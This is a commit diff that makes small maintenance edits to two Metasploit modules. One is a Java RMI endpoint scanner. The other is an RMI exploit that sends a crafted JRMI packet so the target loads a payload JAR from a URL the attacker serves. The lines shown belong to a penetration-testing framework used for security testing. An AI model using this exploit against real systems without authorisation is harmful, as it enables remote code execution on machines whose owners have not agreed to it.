Small updates to the rmi modules
This commit is contained in:
parent
63ed7fcc8f
commit
4c2e1c2859
|
@ -48,14 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if res and res =~ /^\x4e..([^\x00]+)\x00\x00/
|
||||
info = $1
|
||||
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected (identified us as '#{info}')")
|
||||
report_service(:host => rhost, :port => rport, :name => "rmi", :info => "Java RMI Endpoint (identified us as #{info})")
|
||||
report_vuln(
|
||||
:host => rhost,
|
||||
:name => self.fullname,
|
||||
:port => rport,
|
||||
:info => "Identified Java RMI Endpoint",
|
||||
:refs => self.references
|
||||
)
|
||||
report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Java RMI Endpoint")
|
||||
end
|
||||
|
||||
rescue ::Interrupt
|
||||
|
|
|
@ -79,9 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||
|
||||
register_autofilter_ports([ 1098, 1099 ])
|
||||
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -101,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
packet[idx, find_me.length] = len + new_url
|
||||
|
||||
# write out minimal header and packet
|
||||
print_status("Sending request for #{new_url}")
|
||||
print_status("Connected and sending request for #{new_url}")
|
||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
||||
|
||||
|
@ -130,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Pragma' => 'no-cache'
|
||||
})
|
||||
|
||||
print_status("Replied to Request for Payload JAR")
|
||||
print_status("Replied to request for payload JAR")
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue